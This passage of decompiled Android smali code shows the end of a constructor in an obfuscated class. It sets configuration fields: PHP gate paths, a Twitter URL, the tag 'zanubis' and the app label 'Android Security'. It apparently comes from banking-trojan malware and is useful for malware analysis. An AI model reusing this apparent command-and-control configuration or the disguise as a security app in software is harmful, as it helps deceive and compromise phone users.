
    iput-object v0, p0, Lwocwvy/czyxoxmbauu/slsa/c;->a:Ljava/lang/String;

    const-string v0, ""

    iput-object v0, p0, Lwocwvy/czyxoxmbauu/slsa/c;->b:Ljava/lang/String;

    const-string v0, "/o1o/a1.php"

    iput-object v0, p0, Lwocwvy/czyxoxmbauu/slsa/c;->c:Ljava/lang/String;

    const-string v0, "https://twitter.com/qweqweqwe"

    iput-object v0, p0, Lwocwvy/czyxoxmbauu/slsa/c;->d:Ljava/lang/String;

    const-string v0, "/o1o/a2.php"

    iput-object v0, p0, Lwocwvy/czyxoxmbauu/slsa/c;->e:Ljava/lang/String;

    const/4 v0, 0x0

    iput-boolean v0, p0, Lwocwvy/czyxoxmbauu/slsa/c;->f:Z

    iput-boolean v0, p0, Lwocwvy/czyxoxmbauu/slsa/c;->g:Z

    const-string v1, "zanubis"

    iput-object v1, p0, Lwocwvy/czyxoxmbauu/slsa/c;->h:Ljava/lang/String;

    const-string v1, "tag"

    iput-object v1, p0, Lwocwvy/czyxoxmbauu/slsa/c;->i:Ljava/lang/String;

    const-string v1, "tag"

    iput-object v1, p0, Lwocwvy/czyxoxmbauu/slsa/c;->j:Ljava/lang/String;

    const-string v1, "Android Security"

    iput-object v1, p0, Lwocwvy/czyxoxmbauu/slsa/c;->k:Ljava/lang/String;

    const/16 v1, 0x2710

    iput v1, p0, Lwocwvy/czyxoxmbauu/slsa/c;->l:I

    const-string v1, ""

    iput-object v1, p0, Lwocwvy/czyxoxmbauu/slsa/c;->m:Ljava/lang/String;

    const/16 v1, 0x2ee0

    iput v1, p0, Lwocwvy/czyxoxmbauu/slsa/c;->n:I

    iput-boolean v0, p0, Lwocwvy/czyxoxmbauu/slsa/c;->o:Z

    const-string v1, "<urlImage>"

    iput-object v1, p0, Lwocwvy/czyxoxmbauu/slsa/c;->p:Ljava/lang/String;

    iput-boolean v0, p0, Lwocwvy/czyxoxmbauu/slsa/c;->q:Z

    const/16 v1, 0x12c

    iput v1, p0, Lwocwvy/czyxoxmbauu/slsa/c;->r:I

    iput v0, p0, Lwocwvy/czyxoxmbauu/slsa/c;->s:I

    const/4 v0, 0x1

    iput v0, p0, Lwocwvy/czyxoxmbauu/slsa/c;->t:I

    return-void
.end method
